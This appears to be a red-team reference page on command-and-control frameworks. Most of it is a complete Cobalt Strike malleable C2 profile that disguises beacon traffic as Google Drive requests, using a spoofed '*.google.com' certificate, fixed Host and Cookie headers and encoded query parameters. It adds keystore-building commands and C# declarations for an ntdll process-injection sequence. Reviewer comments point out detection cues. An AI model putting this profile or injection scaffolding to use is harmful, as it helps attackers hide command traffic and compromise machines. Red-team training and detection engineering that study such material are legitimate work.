Why this topic matters
C2 frameworks matter because they change how an operator frames the problem, chooses validation steps and decides what evidence is strong enough to keep. In real work, weak handling of this topic leads to wasted time, noisy testing and softer findings.
This brief treats C2 frameworks as a reusable field reference. The focus is on attack surface, decision points, practical workflow and the public material that is worth keeping nearby when you need to execute, verify or explain the subject under pressure.
Core coverage
The points below capture the main workflows, concepts, tools and operator decisions associated with C2 frameworks.
- C2 frameworks
- PoshC2
- Havoc C2 framework
- Brute Ratel
- Cobalt Strike
- Start the Cobalt Strike team server without a custom C2 profile
- Start the Cobalt Strike client
- On teamserver connect
- Cobalt strike dashboard
- Listener create
Commands and snippets
#
# Google Drive
#
# Author: @bluscreenofjeff
#
#set https cert info
#NOTE(review): the subject fields below reuse a well-known organisation's name and
#wildcard domain. Nothing on this page shows a public CA issuing this certificate, so
#presumably it is self-signed; when inspecting TLS metadata, judge it by issuer and
#chain validation rather than by the subject CN.
https-certificate {
set CN "*.google.com"; #Common Name
set O "Google Inc"; #Organization Name
set C "US"; #Country
set L "Mountain View"; #Locality
set ST "California"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
#default Beacon sleep duration and jitter
#NOTE(review): assuming sleeptime is in milliseconds and jitter is a percentage (the
#usual reading of these options - confirm), check-ins recur at about one-minute
#intervals with limited variation, which is the regularity beaconing analytics measure.
set sleeptime "60000";
set jitter "20";
#default useragent for HTTP comms
#The string is a literal, so every host using this profile sends the same value
#regardless of the browser actually installed on it.
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
#IP address used to indicate no tasks are available to DNS Beacon
set dns_idle "8.8.4.4";
#Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_sleep "0";
#Maximum length of hostname when uploading data over DNS (0-255)
set maxdns "235";
#Shape of the http-get transaction: the client block describes the request that is
#sent, the server block describes the reply.
http-get {
set uri "/viewerng/meta";
client {
header "Accept" "text/html,application/xml;*/*;";
header "Accept-Encoding" "gzip, deflate";
#The Host header and Cookie are literals written into every request by the profile;
#they are not derived from the address the connection is made to. Comparing the Host
#value with the real destination, and matching the constant Cookie value, are
#therefore usable detection checks.
header "Host" "drive.google.com";
header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
#session metadata
#Encoded with base64url, netbios, base64url in that order and carried in the "id"
#query parameter.
metadata {
base64url;
netbios;
base64url;
parameter "id";
}
#A second query parameter, "u", is sent with the constant value "0".
parameter "u" "0";
}
server {
#Fixed response headers; the same nine headers are repeated in the http-post server block.
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Connection" "close";
#Beacon's tasks
#Written to the response with the print statement; no encoding step is listed before it.
output {
print;
}
}
}
#Shape of the http-post transaction. NOTE(review): the verb is set to GET, so a
#proxy-log query that only considers POST requests would not cover this traffic.
#The uri differs from the http-get uri ("/viewerng/meta") by one letter; a URI-based
#detection should list both paths.
http-post {
set uri "/viewersng/meta";
set verb "GET";
client {
header "Accept" "text/html,application/xml;*/*;";
header "Accept-Encoding" "gzip, deflate";
#Same literal Host and Cookie values as the http-get client block.
header "Host" "drive.google.com";
header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
#Client output is encoded with base64url, netbios, base64url in that order and
#carried in the "id" query parameter, so with the GET verb it appears in the URL.
output {
base64url;
netbios;
base64url;
parameter "id";
}
#session ID
#Carried in the "u" query parameter with no encoding step listed.
id {
parameter "u";
}
}
server {
#Fixed response headers, identical to those in the http-get server block.
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Connection" "close";
output {
print;
}
}
}
#change the stager server
#Only three response headers are set for the server side; no client block is given.
http-stager {
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
}
}
#NOTE(review): the two shell commands below were fused onto the closing brace in the
#source page; they are not part of the profile. openssl bundles private.key and
#public.crt into the PKCS#12 file c2_profile.pkcs12, and keytool imports that file into
#the keystore c2_profile.store. Both output files contain the private key and need the
#same protection as private.key itself.
openssl pkcs12 -inkey private.key -in public.crt -export -out c2_profile.pkcs12
keytool -importkeystore -srckeystore c2_profile.pkcs12 -srcstoretype pkcs12 -destkeystore c2_profile.store
using System;
using System.Runtime.InteropServices;
namespace NtMapViewOfSection
{
/// <summary>
/// P/Invoke declarations for three ntdll.dll exports: NtCreateSection,
/// NtMapViewOfSection and NtCreateThreadEx. Each is declared to return a uint.
/// </summary>
// NOTE(review): creating a section, mapping a view of it into a process handle and
// starting a thread at an address in that process is the sequence catalogued as process
// injection (MITRE ATT&CK T1055); presumably that is why the three are grouped here.
// On the defensive side this shows up as cross-process view mapping followed by remote
// thread creation, so telemetry that observes the native-API layer is where to look.
// NOTE(review): NtCreateThreadEx has no published Microsoft prototype; the parameter
// types below are this page's and are not confirmed here - TODO verify before relying on them.
internal class Native
{
    /// <summary>
    /// Declares the ntdll.dll export NtCreateSection. SectionHandle and MaximumSize
    /// are passed by reference.
    /// </summary>
    [DllImport("ntdll.dll")]
    public static extern uint NtCreateSection(
    ref IntPtr SectionHandle,
    uint DesiredAccess,
    IntPtr ObjectAttributes,
    ref ulong MaximumSize,
    uint SectionPageProtection,
    uint AllocationAttributes,
    IntPtr FileHandle);
    /// <summary>
    /// Declares the ntdll.dll export NtMapViewOfSection. BaseAddress and ViewSize are
    /// out parameters; ProcessHandle selects the process the view is mapped into.
    /// </summary>
    [DllImport("ntdll.dll")]
    public static extern uint NtMapViewOfSection(
    IntPtr SectionHandle,
    IntPtr ProcessHandle,
    out IntPtr BaseAddress,
    IntPtr ZeroBits,
    IntPtr CommitSize,
    IntPtr SectionOffset,
    out ulong ViewSize,
    uint InheritDisposition,
    uint AllocationType,
    uint Win32Protect);
    /// <summary>
    /// Declares the ntdll.dll export NtCreateThreadEx. threadHandle is an out parameter;
    /// processHandle and startAddress name the process and the address passed to the call.
    /// </summary>
    [DllImport("ntdll.dll")]
    public static extern uint NtCreateThreadEx(
    out IntPtr threadHandle,
    uint desiredAccess,
    IntPtr objectAttributes,
    IntPtr processHandle,
    IntPtr startAddress,
    IntPtr parameter,
    bool createSuspended,
    int stackZeroBits,
    int sizeOfStack,
    int maximumStackSize,
    IntPtr attributeList);
}
}
Curated public references
- Nmap · Man.html: nmap.org/book/man.html
- BloodHound Documentation: bloodhound.specterops.io/
- GitHub · fortra / impacket: github.com/fortra/impacket
- MITRE ATT&CK: attack.mitre.org/
